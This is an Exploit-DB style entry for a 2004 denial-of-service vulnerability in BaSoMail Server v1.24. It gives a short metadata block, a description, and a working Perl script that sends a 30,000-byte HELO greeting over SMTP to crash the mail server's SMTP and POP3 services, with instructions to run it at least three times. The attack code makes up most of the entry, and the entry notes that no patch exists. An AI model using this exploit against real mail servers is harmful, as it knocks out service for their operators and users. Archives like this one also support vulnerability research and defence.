BaSoMail Server POP3 and SMTP v1.24 D.o.S

vendor:

BaSoMail Server

by:

Ziv Kamir

N/A

CVSS

N/A

Denial of Service

CWE

Product Name: BaSoMail Server

Affected Version From: v1.24

Affected Version To: v1.24

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2004

BaSoMail Server POP3 and SMTP v1.24 D.o.S

This exploit sends a HELO request packet containing 30K of data to the BaSoMail Server POP3 and SMTP v1.24. If used at least 3 times, it will cause a Denial of Service (D.o.S) on the SMTP and POP services. This exploit was discovered by Ziv Kamir and exploited by KaGra. It has been tested on Windows XP SP1 English.

Mitigation:

Unknown

Source

Exploit-DB raw data:

#!/usr/bin/perl


###############################################
#  BaSoMail Server POP3 and SMTP v1.24 D.o.S  #	
#  Discovered by Ziv Kamir,exploited by KaGra #
#					      #
#  This Sploit sends as HELO request 1 packet #
#  of 30K of data.If U use it at least 3 times#
#   SMTP and POP services will be D.o.Sed.    #
#     	 Tested in WinXP SP1 EnGlish	      #	
###############################################




use Net::SMTP;
print "\n[*]BuiLDinG BuFfer...\n";
$evil = 'A'x30000   ;

print "[*]@@@...SenDing DeViL...HeLL UnleaSheD...wait at least 30 seconds...@@@\n";

$smtp = Net::SMTP->new('localhost',
			Hello=>$evil,
			Timeout=>30,
			
			);

print "\nTarGet Has BeeN D.o.Sed,use Exploit at Least 3 times \n";
print "and then check if Server aLiVe!\n\n";

# milw0rm.com [2004-10-24]